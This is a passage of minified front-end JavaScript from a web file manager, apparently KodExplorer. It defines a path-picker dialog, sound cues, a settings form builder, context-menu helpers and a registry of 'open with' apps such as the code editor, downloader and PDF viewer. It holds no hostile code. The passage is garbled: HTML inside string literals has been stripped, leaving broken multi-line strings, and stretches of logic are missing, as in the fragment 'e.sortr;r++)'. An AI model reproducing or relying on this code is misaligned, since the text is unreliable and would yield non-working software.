if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p}; -if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var 